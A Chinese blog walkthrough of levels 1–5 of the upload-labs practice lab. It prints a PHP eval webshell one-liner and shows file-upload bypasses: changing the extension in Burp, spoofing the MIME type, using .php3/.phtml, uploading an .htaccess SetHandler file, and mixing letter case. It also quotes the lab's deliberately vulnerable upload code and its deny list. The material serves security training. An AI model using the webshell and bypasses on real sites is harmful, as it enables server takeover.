upload-labs的搭建与通关1-5

最新推荐文章于 2024-09-26 18:03:51 发布
最新推荐文章于 2024-09-26 18:03:51 发布
阅读量2.1k 收藏 13
点赞数 4
分类专栏: 笔记 文章标签: docker labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/loseheart157/article/details/107332783
版权

文章内容

搭建upload-labs

  • docker 搭建upload-labs

    我们正常搭建
    docker search upload-labs
    docekr pull xxx
    docekr run -it --name xxx -p 80:80 --rm xxx
    如果用镜像的话,最好获取新的镜像源,pull速度太慢,建议更换

  • 浏览器无法加载出来正常页面

    因为此前我们做过sqli-labs,所以可能环境搭好后可能会有页面缓冲,页面不是这样的。

    在这里插入图片描述
    此时我们可以这样:设置 ->隐私与安全 ->网站数据 ->清除网站数据
    之后就可以加载到正常界面了

upload-labs的通关

  • 第1关

  • 在这里插入图片描述
    第一关没有限制,但是提示先创建upload文件

    我们在docker中进入容器 用 mkdir upload即可正常进行

    我们先写好一句话木马
    <?php @eval($_POST['attack']) ?> 命名为webshell.php,
    但是,php文件无法上传,可以断定是前端检测
    我们先把他后缀名改为jpg,再用burp抓包,找到此选项,将其后缀名改为php在这里插入图片描述
    如图,改为后缀名php,这样我们就把木马植入进去了。
    用中国菜刀看一下,好的,我们获取控制权限了。在这里插入图片描述

    第2关

    本关先看一下源代码吧

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }

和第一关差不多,我们把type改成他允许的类型。
'image/jpeg 或者 image/png’等等
继续用burp抓包
在这里插入图片描述
将如图所示修改即可

第3关

在这里插入图片描述
把php后缀ban掉了
这样我们尝试.php3(php2,3,4,5都行)或.phtml绕后
在这里插入图片描述
菜刀试一下,能不能,ok,成功
在这里插入图片描述
等等,你知道什么是php3吗?

在这里插入图片描述
我们在apache服务器解析中,会像这样添加配置,将php3等后缀文件解析成php文件。在我们搭建的docker环境中,他已经配置好了,所以不需要我们配置

在这里插入图片描述

第4关

在这里插入图片描述
这关,又又又ban了一堆,正好认识一个新朋友

我们先来介绍一下htaccess

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置

我们先创建一个以hack.htaccess为名的文件,
配置内容如下
SetHandler application/x-httpd-php
这样可以把所有的文件当php文件执行

原理

.htacess文件作为局部变量作用文件成功作用的两个条件

  1. Allow Override ALL
  2. LOadModule rewrite_moudle_moudles/mod_rewrite.so#rewrite模块为开启状态
原理测试
  • 当rewrite模块开启,配置文件httpd.conf如下时,apache服务器会将所有.jpg为后缀的文件作为php文件解析。

<Directory />
    Options FollowSymLinks
    AllowOverride All
    AddType application/x-httpd-php .jpg	#将.jpg后缀的文件作为PHP文件解析
</Directory>
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
#AddType application/x-tar .tgz

当我们上传.htaccess文件到upload目录时,upload目录下的文件会按其配置生效解析
http.conf文件配置

Directory />
    Options FollowSymLinks
    AllowOverride All
</Directory>

.htaccess文件中的内容可以是

AddType application/x-httpd-php .jpg
但是好几次这样没有起到效果,同时,apache会将所有的.jpg后缀的文件当作php文件解析,这样会明显影响系统的功能,,改进代码如下,这样系统就只对文件名包含“info.png”字符串的文件进行解析,例如aaainfo.png,aaainfo.pngxsdf,aaainfo.png.txt。

<FilesMatch "info.png">
setHandler application/x-httpd-php
</FilesMatch>

改进之后

<FilesMatch "^info.png$">
setHandler application/x-httpd-php
</FilesMatch>
接上文

然后用burp抓包,把前缀删掉,只留下.htaccess,把这个传上去之后,在上传我们的webshell,jpg文件,这样就能获取他的权限。在这里插入图片描述

总结

最后再总结一下这个漏洞可以利用的条件

  • apache服务器
  • 能够上传.htaccess文件,一般为黑名单限制。
  • AllowOverride All,默认配置为关闭None。
  • LoadModule rewrite_module modules/mod_rewrite.so #模块为开启状态
  • 上传目录具有可执行权限。

第5关

在这里插入图片描述
第五关把第四关的外援给ban了,但你仔细观看源代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

没错,他不像前几关一样,会把输入的大小写全部转化为小写,我们采用sqli-labs用过的大小写,混合注入。更改为webshell.Php,这样,顺利注入。
在这里插入图片描述
后续会不久后补齐,希望大家支持一下。(小白一个,欢迎指正)

h0ld1rs
关注
专栏目录
upload-labs靶场 1-5关 详细教学 上传漏洞
小明师傅博客
06-02 784
第一关 我们来上传一个一句话木马 php格式的 发现不允许上传php类型,只能上传图片类型 我们打算用bp抓包改包,实现上传通关 先把文件改成jpg类型,然后打开代理和bp抓包,再改成php类型 放包 上传成功 我们来查看上传地址,f12审查找到上传地址 菜刀连他 通关 第二关(记得把第一关的上传文件删了) 继续用第一关的方法试一下 发现还是可以直接成功的 但这里也可以有第二种方法 直接用php上传,抓包,看Content-Type的值 上传php文件时,Content-Type的.
upload-labs通关秘籍和安装环境
weixin_47543868的博客
12-18 8150
upload-labs通关一.什么是upload-labs?二.漏洞三.安装环境四.小试牛刀第一关 pass-01 客户端检测绕过(js检测)第二关 pass-02 content-type(服务器端检测–MIME 类型)第三关 上传可解析的文件后缀名第四关 黑名绕过 .htaccess第五关 黑名单 大小写绕过第六关 黑名单 空格绕过第七关 黑名单 点绕过第八关 黑名单 ::$DATA第九关 点 空格绕过黑名单第十关 双写绕过黑名单第十一关第十二关第十三关第十四关第十五关第十六关第十七关 一.什么
Upload-Labs(1-5)
Braindance
02-28 98
介绍 大部分的网站和应用系统都有上传功能,而程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。这时攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(jsp、asp、php、aspx文件后缀)到服务器上,从而访问这些恶意脚本中包含的恶意代码,进行动态解析最终达到执行恶意代码的效果,进一步影响服务器安全。 在线靶机地址: linux环境 windows环境 Pass-01 ​ 尝试上传php木马,发现提示上传错误 ​ 提示只能上传jp.
刷题学习日记 (1) - SWPUCTF
最新发布
2302_81156108的博客
09-26 993
学习一下午的收获
upload-labs搭建
outman23的博客
04-08 819
upload-labs搭建下载PHPstudy下载源码环境安装打开网站 下载PHPstudy 这里版本推荐下载2018版本的phpstudy 可能版本年份要与当时源码发行年份一样, phpstudy2018下载网站:https://www.xp.cn/download.html 打开后 然后点击切换版本,最好把php版本改到5.2.17 下载源码 源码地址:https://github.com/Tj1ngwe1/upload-labs 点击Download ZIP 下载 环境安装 然后把文件解压到WWW
File Upload(文件上传)(upload-labs 1-5)
hclimg的博客
07-30 993
文件上传介绍 在现代的互联网WEB应用程序中,上传文件是一种常见的功能,它有助于提高业务效率,比如企业的OA系统,允许用户上传头像、照片等许多类型的文件。然而,开放的功能越多,WEB应用受到攻击的风险越大。如果WEB应用存在文件上传漏洞,那么攻击者就可以利用这个漏洞将可执行脚本程序上传到服务器中,获得网站的权限从而进一步危害服务器 文件上传原理 文件上传漏洞通常是未对客户端上传文件的类型、...
upload-labs 搭建通关(文件上传漏洞)
rang的博客
11-02 806
环境链接:https://github.com/c0ny1/upload-labs 第一关:绕过前端JS限制 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类
手把手教你玩转upload-labs靶场(1--20关超详细保姆级)
weixin_52796034的博客
08-23 973
Upload-labs靶场是一个内容全面且开源的PHP文件上传漏洞训练场所。它以真实的文件上传漏洞场景为基础,为安全研究人员和开发人员提供了一个实践和学习的平台。靶场提供了多种不同类型的漏洞场景,涵盖了文件类型绕过、文件名绕过、MIME类型绕过、大小限制绕过等多个方面。每个场景都有详细的解题思路和说明,帮助用户深入理解漏洞的原理和利用方式。通过上传恶意文件,用户可以亲身体验漏洞的利用技巧,并学习如何防范这些漏洞。Upload-labs靶场不仅提供了实践性,还提供了防御机制的实践,帮助用户全面了解如何保护系统
upload-labs通关攻略教程【1-11关】(持续更新中)
m0_55854679的博客
05-23 9993
Pass-01-js检查 查看题目源码,发现三种后缀的文件可以上传。 上传一个后缀为.jpg的文件,文件内容为一句话木马<?php phpinfo();?>使用burp抓包并修改文件后缀为php,查看响应 上传成功后点开图片木马,发现php配置页面,说明上传成功。 Pass-02-MIME验证(content-type验证) 查看题目源码 查看题目提示为MIME验证,分析源码,可以通过burp抓包修改数据包的第二个content-type,并查看响应。 3. 拖拽点击上传成功的图片木马
upload-labs通关总结 | 那些年踩过的坑
m0_56691564的博客
10-31 1469
本文就是简单总结一下upload-lab通关方法和踩过的坑,参考的通关教程放在文末,需要的小伙伴去看~
upload-labs安装及攻略
热门推荐
K_ShenH的博客
01-14 2万+
upload-labs靶场的安装搭建(windows) (1)首先当然是需要phpstudy的环境,所以要先下载安装phpstudy。 (2)然后到github的网址中下载源码的压缩包。 github网址:https://github.com/Tj1ngwe1/upload-labs (3)下载后解压缩到phpstudy目录下的WWW子文件夹中,这里要注意吧压缩包的名字改成upload-labs,不然靶场的页面会显示得不对。 (4)然后在输入url HTTPS:...
upload-labs-master【文件上传靶场】
04-05
最新版文件上传靶场
如何搭建upload-labs
m0_59324968的博客
02-26 523
简单搭建upload-labs环境
用php搭建upload_labs
2301_80050903的博客
11-09 162
下载好后解压到php的www文件中,并将文件名修改为upload_labs。首先打开php建立网站,域名为upload_labs,并创建数据库。在前面加上127.0.0.1/再次打开,出现以下界面,搭建成功。返回phpstudy打开upload_labs的网站。然后从网上下载upload_labs的安装包。
文件上传之upload-labs 1~5 详细介绍
weixin_51446936的博客
09-18 2372
一、Pass-01(前端js验证) 1.1 原理描述 在文件上传时,用户选择文件时,或者提交时,有些网站会对前端文件名进行验证,一般检测后缀名,是否为上传的格式。如果上传的格式不对,则弹出提示文字。此时数据包并没有提交到服务器,只是在客户端通过 js 文件进行校验,验证不通过则不会提交到服务器进行处理。 1.2 实验操作 试着上传一个php文件,出现一个前端验证的提示,表示客户端只是通过js文件进行了验证,没有提交到服务器里 1.3 查看源码 function checkFile() { v
Upload-Labs 文件上传关卡 第1-5关、14关 详解
qq_62987084的博客
06-20 384
Upload-Labs 文件上传 第1-5关、14关 详解
upload-labs靶场的安装搭建
qq_51331767的博客
02-24 4152
3、将下载的压缩包解压到phpstudy文件,phpstudy/www网站的根目录下。运行镜像docker run -d -p 90:80 cuer/upload-labs。4、本地浏览器访问127.0.0.1/upload-labs/就可以访问靶场了。2、然后到GitHub去下载upload-labs的源码。1、首先安装phpstudy的环境,下载进行安装。将upload-labs镜像拉取到本地仓库。在镜像仓库搜索upload-labs镜像。查看本地镜像,如图下载成功。
upload-labs-master靶场 Pass01-05通关秘诀(详解版)
鱼溯的博客
08-21 563
upload-labs-master靶场 Pass01-05通关秘诀(详解版)
UPLOAD labs 第四关
nayousa的博客
05-27 703
大意就是htaccess是apache服务中的一个配置文件 ,负责相关目录下的网页配置,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、,大概搜了一下,就是后缀我成了htaccess,但是内容还是可以被当作php执行的,这就好办多了。、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。这后缀限制的不是一般的多,初学者还是先按照系统给的思路练习最佳。作为一个铁废物,来百度一下。写入此命令,上传文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值